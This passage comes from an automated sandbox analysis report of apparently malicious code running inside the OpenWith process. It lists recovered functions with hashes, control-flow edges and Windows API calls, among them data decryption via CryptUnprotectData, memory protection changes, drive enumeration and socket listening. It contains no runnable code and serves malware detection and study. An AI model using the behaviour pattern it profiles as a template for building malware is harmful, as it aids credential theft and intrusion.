                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort_calloc_dbg
                        • String ID: $0$@
                        • API String ID: 3053611130-2347541974
                        • Opcode ID: 2efbfb43f5b264e98edc7990400f44a606071b03ecf31d8e2d45c18cdd4aafd7
                        • Instruction ID: bec641e8bc709a4b2767b166229aefbe6d6482b77c6f451b06020800090fc82a
                        • Opcode Fuzzy Hash: 2efbfb43f5b264e98edc7990400f44a606071b03ecf31d8e2d45c18cdd4aafd7
                        • Instruction Fuzzy Hash: D4514B3060CB898FE764DB58D8847ABBBE5FF95351F10052EA48EC3260DBB4E4458B52
                        Function 0000025B14E21CD0 Relevance: 4.8, APIs: 3, Instructions: 278memorynativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptAllocateChangeCloseConnectFindHeapNotificationPort
                        • String ID:
                        • API String ID: 3171316915-0
                        • Opcode ID: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
                        • Instruction ID: debff9680ff50cb907f76ceb73fd8d86eb9ec57441230a5c21eb03bc985f3583
                        • Opcode Fuzzy Hash: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
                        • Instruction Fuzzy Hash: 3A91D631508E088FDBA9EF18C895FE5B7E1FB88311F14865AD49FC3196DB34E9428789
                        Function 0000025B14E21A90 Relevance: 4.6, APIs: 3, Instructions: 150nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort$ExceptionHandlerMitigationPolicyProcessVectored
                        • String ID:
                        • API String ID: 1453854198-0
                        • Opcode ID: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
                        • Instruction ID: cbee6c07ba73ff1d36649bd911dbfbb00c0239f0a3b19900a3f034b6294cec09
                        • Opcode Fuzzy Hash: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
                        • Instruction Fuzzy Hash: 7D41E130208F488FDB59DF2C8889B957B91EB59320F04439EE95ECB2C7DA34C9058799
                        Function 00007DF41F04F83C Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                        • String ID:
                        • API String ID: 2502124517-0
                        • Opcode ID: 9f21c1481329a0ea06529805dac4bd9f865f37b17101e2c3294277e11989e67f
                        • Instruction ID: 97dd9d43e3d3b424bd3ddad6f3fb4fa9bd64db177be7802468048b463773715a
                        • Opcode Fuzzy Hash: 9f21c1481329a0ea06529805dac4bd9f865f37b17101e2c3294277e11989e67f
                        • Instruction Fuzzy Hash: C631A230608A498FE794DF28D8887AA7BE0FF94320F50463ED45BC3195DB38D846C791
                        Function 00007DF41F045BD8 Relevance: 3.7, APIs: 2, Instructions: 747COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 215 7df41f045bd8-7df41f045c3e call 7df41f07d780 * 2 call 7df41f07e350 222 7df41f046435-7df41f046458 call 7df41f07c200 215->222 223 7df41f045c44-7df41f045c4d call 7df41f033824 215->223 228 7df41f04642f 223->228 229 7df41f045c53-7df41f045ca3 call 7df41f07c220 223->229 228->222 229->228 233 7df41f045ca9-7df41f045cd8 call 7df41f033130 229->233 239 7df41f046406-7df41f046414 233->239 240 7df41f045cde-7df41f045d4d call 7df41f0514f8 call 7df41f033564 233->240 241 7df41f046416-7df41f046419 239->241 242 7df41f046421-7df41f046427 call 7df41f033174 239->242 250 7df41f045fac-7df41f045fb4 call 7df41f032124 240->250 251 7df41f045d53-7df41f045de7 240->251 241->242 244 7df41f04641b 241->244 242->228 244->242 256 7df41f045fba-7df41f046009 call 7df41f0331c8 * 2 call 7df41f0331a4 250->256 257 7df41f0463ed-7df41f0463fa call 7df41f051510 250->257 253 7df41f045dee-7df41f045e1d call 7df41f0331c8 call 7df41f0339d4 251->253 266 7df41f045ea7-7df41f045eb6 253->266 267 7df41f045e23-7df41f045e46 call 7df41f07c22c _calloc_dbg 253->267 289 7df41f04600b-7df41f046012 256->289 290 7df41f04601a-7df41f04604f call 7df41f044dfc call 7df41f041cd0 call 7df41f0331a4 256->290 257->239 266->253 268 7df41f045ebc-7df41f045ee7 call 7df41f0331a4 call 7df41f0331c8 266->268 275 7df41f045e99-7df41f045e9a 267->275 276 7df41f045e48-7df41f045e97 call 7df41f07c240 call 7df41f031000 267->276 283 7df41f045ee9-7df41f045f1d call 7df41f0339d4 268->283 277 7df41f045e9e-7df41f045ea1 ??3@YAXPEAX@Z 275->277 276->277 277->266 296 7df41f045f1f-7df41f045f7d call 7df41f051564 call 7df41f04a364 call 7df41f07c220 283->296 297 7df41f045f83-7df41f045fa2 call 7df41f0331a4 call 7df41f043d38 call 7df41f033810 283->297 289->290 307 7df41f04605b-7df41f04605e 290->307 308 7df41f046051-7df41f046056 call 7df41f041d04 call 7df41f05c8b0 290->308 296->283 296->297 319 7df41f045fa7-7df41f045fa8 297->319 312 7df41f046064-7df41f04609c call 7df41f07c22c call 7df41f0588ac 307->312 313 7df41f046369-7df41f046370 307->313 308->307 312->313 331 7df41f0460a2-7df41f0460b2 312->331 318 7df41f046394-7df41f04639b 313->318 320 7df41f04639d 318->320 321 7df41f046372-7df41f04638b 318->321 319->250 325 7df41f0463c1-7df41f0463c5 320->325 321->318 329 7df41f0463c7-7df41f0463d6 call 7df41f032178 325->329 330 7df41f04639f-7df41f0463b8 325->330 329->257 336 7df41f0463d8-7df41f0463e7 329->336 330->325 331->313 337 7df41f0460b8-7df41f046257 call 7df41f080d6c call 7df41f0535f0 call 7df41f0806a8 call 7df41f0441d8 call 7df41f080ddc call 7df41f04f98c call 7df41f0809bc 331->337 336->257 356 7df41f04625c-7df41f046282 call 7df41f04f9d8 337->356 361 7df41f0462a6-7df41f0462a9 356->361 362 7df41f046284-7df41f04629d 361->362 363 7df41f0462ab 361->363 362->361 364 7df41f0462cf-7df41f0462d3 363->364 365 7df41f0462d5-7df41f0462fd 364->365 366 7df41f0462ad-7df41f0462c6 364->366 370 7df41f0462ff-7df41f046303 365->370 366->364 371 7df41f046305-7df41f046328 370->371 372 7df41f046342-7df41f04635d 370->372 373 7df41f046337-7df41f046340 371->373 374 7df41f04632a-7df41f046332 371->374 372->313 373->370 374->373
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@_calloc_dbg_malloc_dbg
                        • String ID:
                        • API String ID: 2766757376-0
                        • Opcode ID: 6d91b1f4bef4ac05faf3d87a6c08fb192cea63226e2e58e6cafd0a6581730c4f
                        • Instruction ID: 9b614231cfb528f78db2b30316a76aba82e12d2c1d46e7a363ad75e86b2b89a6
                        • Opcode Fuzzy Hash: 6d91b1f4bef4ac05faf3d87a6c08fb192cea63226e2e58e6cafd0a6581730c4f
                        • Instruction Fuzzy Hash: 36423F70518F888FEB95EF28D885A9AB7E1FF58710F20462AD04FC7252EF34A545CB91
                        Function 00007DF41F05A600 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 378 7df41f05a600-7df41f05a622 379 7df41f05a624-7df41f05a627 378->379 380 7df41f05a62c-7df41f05a62f 378->380 381 7df41f05a6c2-7df41f05a6ca 379->381 382 7df41f05a63b-7df41f05a651 380->382 383 7df41f05a631-7df41f05a636 380->383 384 7df41f05a65a-7df41f05a689 382->384 385 7df41f05a653-7df41f05a654 382->385 383->381 386 7df41f05a68b-7df41f05a69c NtAcceptConnectPort 384->386 387 7df41f05a69e 384->387 385->384 388 7df41f05a6a3-7df41f05a6a5 386->388 387->388 389 7df41f05a6a7-7df41f05a6b1 388->389 390 7df41f05a6c0 388->390 391 7df41f05a6b9 389->391 392 7df41f05a6b3-7df41f05a6b7 389->392 390->381 393 7df41f05a6be 391->393 392->393 393->390
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: cde0ffe81ef901ac1f3e20277e9996c873e54bf14cb1d3d6ec20e7420b01d3b2
                        • Instruction ID: 211cfc43ecd35a96832299cc3e3289dcb4d79dd130c818f69a316a7a6020643d
                        • Opcode Fuzzy Hash: cde0ffe81ef901ac1f3e20277e9996c873e54bf14cb1d3d6ec20e7420b01d3b2
                        • Instruction Fuzzy Hash: 2F219831B1CBC84FD750AF58848475A76E0FF99321F60053FE44EC32A0D6B8A8858751
                        Function 00007DF41F05A540 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 395 7df41f05a540-7df41f05a559 396 7df41f05a55b-7df41f05a55e 395->396 397 7df41f05a563-7df41f05a566 395->397 398 7df41f05a5f6-7df41f05a5fe 396->398 399 7df41f05a568-7df41f05a56d 397->399 400 7df41f05a572-7df41f05a587 397->400 399->398 401 7df41f05a589-7df41f05a58d 400->401 402 7df41f05a593-7df41f05a5c2 400->402 401->402 403 7df41f05a5c4-7df41f05a5d0 NtAcceptConnectPort 402->403 404 7df41f05a5d2 402->404 405 7df41f05a5d7-7df41f05a5d9 403->405 404->405 406 7df41f05a5db-7df41f05a5e5 405->406 407 7df41f05a5f4 405->407 408 7df41f05a5e7-7df41f05a5eb 406->408 409 7df41f05a5ed 406->409 407->398 410 7df41f05a5f2 408->410 409->410 410->407
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 8470fbff762e3531a12c1b2b11e56c88662d32310fb2e529b80da0b8d4828605
                        • Instruction ID: 611e43c0066618ee21a760c9cd941722b02d69fce5f6e45989de50731340d750
                        • Opcode Fuzzy Hash: 8470fbff762e3531a12c1b2b11e56c88662d32310fb2e529b80da0b8d4828605
                        • Instruction Fuzzy Hash: 7321A771B08AC84FDB509A9884C4A2E7AE4FF9A361F60053FE54FC3260D6B8A9C58751
                        Function 0000025B14E20AC8 Relevance: 3.2, APIs: 2, Instructions: 173nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 474 25b14e20ac8-25b14e20ae2 475 25b14e20c4b-25b14e20c58 474->475 476 25b14e20ae8-25b14e20af9 474->476 477 25b14e20afb-25b14e20b04 476->477 478 25b14e20b06-25b14e20b09 476->478 477->478 479 25b14e20b0b-25b14e20b14 478->479 480 25b14e20b16-25b14e20b19 478->480 479->480 481 25b14e20b1b-25b14e20b24 480->481 482 25b14e20b26-25b14e20b41 480->482 481->482 483 25b14e20b4e-25b14e20b52 482->483 484 25b14e20b43-25b14e20b4c 482->484 485 25b14e20b5f-25b14e20b63 483->485 486 25b14e20b54-25b14e20b5d 483->486 484->483 487 25b14e20b70-25b14e20b7a 485->487 488 25b14e20b65-25b14e20b6e 485->488 486->485 487->475 489 25b14e20b80-25b14e20b83 487->489 488->487 489->475 490 25b14e20b89-25b14e20ba1 489->490 491 25b14e20ba3-25b14e20bb6 490->491 492 25b14e20bb8-25b14e20bbb 490->492 491->491 491->492 492->475 493 25b14e20bc1-25b14e20bc5 492->493 493->475 494 25b14e20bcb-25b14e20bcf 493->494 494->475 495 25b14e20bd1-25b14e20c02 NtAcceptConnectPort 494->495 495->475 496 25b14e20c04-25b14e20c0c 495->496 496->475 497 25b14e20c0e-25b14e20c47 call 25b14e205d8 NtAcceptConnectPort 496->497 497->475
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        • Opcode ID: 82f3aeb1d2454658223fb6d5b21d23051085e6a8eeabdc877af9343281df37cc
                        • Instruction ID: a14909f6888a75a2960906a1b6d99af250c58362e7090c36c69d333de5507cdf
                        • Opcode Fuzzy Hash: 82f3aeb1d2454658223fb6d5b21d23051085e6a8eeabdc877af9343281df37cc
                        • Instruction Fuzzy Hash: A6415F71918D140AE37DE62C8C9AF397BD2F7C930AF30855EE5DAC21D2DA39C5438649
                        Function 00007DF41F0814B8 Relevance: 3.1, APIs: 2, Instructions: 93networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • socket.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF41F0815D9), ref: 00007DF41F0814E5
                          • Part of subcall function 00007DF41F0810C8: ioctlsocket.WS2_32 ref: 00007DF41F0810F4
                        • bind.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF41F0815D9), ref: 00007DF41F08156A
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: bindioctlsocketsocket
                        • String ID:
                        • API String ID: 3555158474-0
                        • Opcode ID: 440c2b03f282fdf09c5109c91abd02df385d83f8f207c58bd0edf43ea5c54b23
                        • Instruction ID: eea42546aafcb5d961d12b5d3af727ed541f3031d882491d4770e1ac5073b8d2
                        • Opcode Fuzzy Hash: 440c2b03f282fdf09c5109c91abd02df385d83f8f207c58bd0edf43ea5c54b23
                        • Instruction Fuzzy Hash: 7D21EA30B48D848FEB58AB78D88C66637E1FF45335F60067AD82FC72E5DA389C424661
                        Function 00007DF41F05A2B0 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        • Opcode ID: 27f7c3ed38e874930e62f200bc0de066e796f05f1e534954138da2be9822abc3
                        • Instruction ID: e7de78d72ef2694e9885aead925c3b9231f3d0fd8636475565c7f9f3ac726caf
                        • Opcode Fuzzy Hash: 27f7c3ed38e874930e62f200bc0de066e796f05f1e534954138da2be9822abc3
                        • Instruction Fuzzy Hash: B281C93091CFC98BE764DB54944466BBBE0FF95354F60463BE44FC71A0DAA8F8828651
                        Function 00007DF41F081950 Relevance: 1.7, APIs: 1, Instructions: 167networkCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Recv
                        • String ID:
                        • API String ID: 4192927123-0
                        • Opcode ID: 6b887d4ee2da175949f8e81a0e65e3d063e47abc8ee875f5d1071da8520f6cd7
                        • Instruction ID: 9297ee99c0cea7e8981aa37b88d287cac06086e53d120d15ec71e22b621abb6d
                        • Opcode Fuzzy Hash: 6b887d4ee2da175949f8e81a0e65e3d063e47abc8ee875f5d1071da8520f6cd7
                        • Instruction Fuzzy Hash: 70512B70948E898FE7A4DF28C488B96BBF0FF54324FA1056AD44BC3551EB39E845CB51
                        Function 00007DF41F059F40 Relevance: 1.6, APIs: 1, Instructions: 121nativeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        • Opcode ID: 2b01fbad4d4e0569ef46bd7dcad2a47669287f66da831324c994fd011c0ec06d
                        • Instruction ID: 173b8794aeba9b6018d35a74c87ee562613fe107683557c279694586a23f9e22
                        • Opcode Fuzzy Hash: 2b01fbad4d4e0569ef46bd7dcad2a47669287f66da831324c994fd011c0ec06d
                        • Instruction Fuzzy Hash: F731D531B1CE894FE7185E189C8557A37E4EF4B321F20523EE94FC32A1D969BC478691
                        Function 00007DF41F04FF7C Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: CryptDataUnprotect
                        • String ID:
                        • API String ID: 834300711-0
                        • Opcode ID: a8ceccc7c3b42bea472bb160e78439ad2ed528e95685be1738a7c7424a046da7
                        • Instruction ID: ab6d6326a3dba6b3eb9335882e3f8ec9f973546b6d13e4c67e93d9e7e68b45f0
                        • Opcode Fuzzy Hash: a8ceccc7c3b42bea472bb160e78439ad2ed528e95685be1738a7c7424a046da7
                        • Instruction Fuzzy Hash: 1931A33071CA884FE744EB68D84966ABBE1FF89311F50452EE48FC3251DE74E8028752
                        Function 00007DF41F058E20 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: DriveLogicalStrings
                        • String ID:
                        • API String ID: 2022863570-0
                        • Opcode ID: 96d4bccc55a322f8c5c27047067bd6e78efec68c6d2ad20cad7b4eab26150e85
                        • Instruction ID: 5167843052bc6e8b486ed57779aa55af41d11db4c2e00506b07e161d0ff4107c
                        • Opcode Fuzzy Hash: 96d4bccc55a322f8c5c27047067bd6e78efec68c6d2ad20cad7b4eab26150e85
                        • Instruction Fuzzy Hash: 9C319631618E848BEB61DB14D8946A777F2FF95310F10451BEC4BC3190EBB9E945C7A1
                        Function 0000025B14E215AC Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,0000025B14E21E16), ref: 0000025B14E21640
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        • Opcode ID: 835a411c94ef729b3118f684f14c42465dca72cdcacd8c0bc7bbe2bb8e6fff18
                        • Instruction ID: ad3e5791ea9ab291de3c497f78fdef6d543326cca27415a07ddd471f66d5ea93
                        • Opcode Fuzzy Hash: 835a411c94ef729b3118f684f14c42465dca72cdcacd8c0bc7bbe2bb8e6fff18
                        • Instruction Fuzzy Hash: 39219375908F098FDB99DF58C8C9A6AF7E1FB68306F044A2EE44AC7260D730D984CB45
                        Function 00007DF41F058C08 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        • Opcode ID: 69ae87b658735349c63cb263c91b486edbc403e9935b0c4573bbe27b5e633224
                        • Instruction ID: a4329d7288bda6297093f6757a84d79571e878ee6aca79374ae0a0e3807c24cd
                        • Opcode Fuzzy Hash: 69ae87b658735349c63cb263c91b486edbc403e9935b0c4573bbe27b5e633224
                        • Instruction Fuzzy Hash: 69F0D070A1CB848FDB64EF2CD4C5B5A7BE0FB99710F504519E84CC3255DB34E8408B86
                        Function 00007DF41F058A40 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        • Opcode ID: 89cd4ab345dceba4e6838d8713e086a2de13f743721c8352f444b7a2b322383a
                        • Instruction ID: 78c4f3c97664e733783238660a8f8a9f3885befff3d7d5778d6f154402c5771b
                        • Opcode Fuzzy Hash: 89cd4ab345dceba4e6838d8713e086a2de13f743721c8352f444b7a2b322383a
                        • Instruction Fuzzy Hash: BBF0B23491CBC48FD7A0EB688480B5ABBF0BB9A350F54491DE8CCC3211D734A585CB13
                        Function 00007DF41F058D94 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,00000000,?,?,00000000,00007DF41F04220C), ref: 00007DF41F058DBE
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        • Opcode ID: 90d86ff9c1e45aa3ed72609050e60067f34580a971d45073cfca8314096fabd0
                        • Instruction ID: d3384979b2b58c4e0c5084980f324ffb161dc7a96dd44adb1ba2c4e6a9c95ce7
                        • Opcode Fuzzy Hash: 90d86ff9c1e45aa3ed72609050e60067f34580a971d45073cfca8314096fabd0
                        • Instruction Fuzzy Hash: 7BE09B31608A448FDB00DF98CCC186AB7F0EBD5314F500D3AEC4BCB164D6A4EA49C662
                        Function 00007DF41F0B7344 Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetSystemInfo.KERNELBASE(?,00007DF41F0C8C07,?,?,?,?,00000000,00000000), ref: 00007DF41F0B7361
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: InfoSystem
                        • String ID:
                        • API String ID: 31276548-0
                        • Opcode ID: d5a7f866afa65459f197dada8cd8f2dc6bf23d315f68f71e19f7445dc10f9d53
                        • Instruction ID: 9f0c6c57e80b57bf3a5b930943de4b89bda7b7c090cecce9decdec6936c0bc62
                        • Opcode Fuzzy Hash: d5a7f866afa65459f197dada8cd8f2dc6bf23d315f68f71e19f7445dc10f9d53
                        • Instruction Fuzzy Hash: 4DE04F31A14C948AF349F730EC965E33761FFA4310B954623D80BC15A2FE3C678A8B91
                        Function 00007DF41F058C90 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        • Opcode ID: d7f11550b64fe24df7d887543e07d0b6f7dff11bcf48c6b7495f6615248458b8
                        • Instruction ID: c647a0b6ec1f544180ce1983a38cfdb207aa3fd0cf56156c433d74de4977afcd
                        • Opcode Fuzzy Hash: d7f11550b64fe24df7d887543e07d0b6f7dff11bcf48c6b7495f6615248458b8
                        • Instruction Fuzzy Hash: 38D05E30D2CFC94BDA54E72888416063AE1FBD5314FE04654D849C3214E27CE54182C2
                        Function 00007DF41F058AFC Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        • Opcode ID: 2e7cca07a0f103a45b23901324486b8ac0a6e280eee8be16fb8f69fcdb4ab649
                        • Instruction ID: dfb47ab9b5b572b931ca6a517b0259e0121c2883a11aadfbc3bb7a4bceab2e3b
                        • Opcode Fuzzy Hash: 2e7cca07a0f103a45b23901324486b8ac0a6e280eee8be16fb8f69fcdb4ab649
                        • Instruction Fuzzy Hash: 20C08C40B1DC8A9AF900A26A4CA820528E4BF4A360F940421D80AC6190E98CF6C283A2
                        Function 00007DF41F044EE8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID: rE\
                        • API String ID: 544645111-988334199
                        • Opcode ID: dad0ceb36d93f336d009a6519c6099e5a7208cb48d97b2cc31c542dde7e3d245
                        • Instruction ID: 7ffae67d8eb0be72e2b3f01c4b496a5da36615a82e7846452bfec75424112dcf
                        • Opcode Fuzzy Hash: dad0ceb36d93f336d009a6519c6099e5a7208cb48d97b2cc31c542dde7e3d245
                        • Instruction Fuzzy Hash: 41217131718D880FEB54F768A8D17AA73E5EBD9710F104439E54FD3285DD28EE068782
                        Function 0000025B168233B0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 344memoryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000003.2278231695.0000025B16820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B16820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_3_25b16820000_OpenWith.jbxd
                        Similarity
                        • API ID: AllocateHeap$BoundaryDeleteDescriptor
                        • String ID: l
                        • API String ID: 2279964584-2517025534
                        • Opcode ID: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
                        • Instruction ID: d193b0f77c71b1b6de26b7c79e5436ff7f2c8083be32819132b70bf65c9aafb4
                        • Opcode Fuzzy Hash: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
                        • Instruction Fuzzy Hash: 26A10131618E580BD76AAE388CA97BA73D1EB94306F10466FE4CBC3583DE34D946C685
                        Function 00007DF41F041F68 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
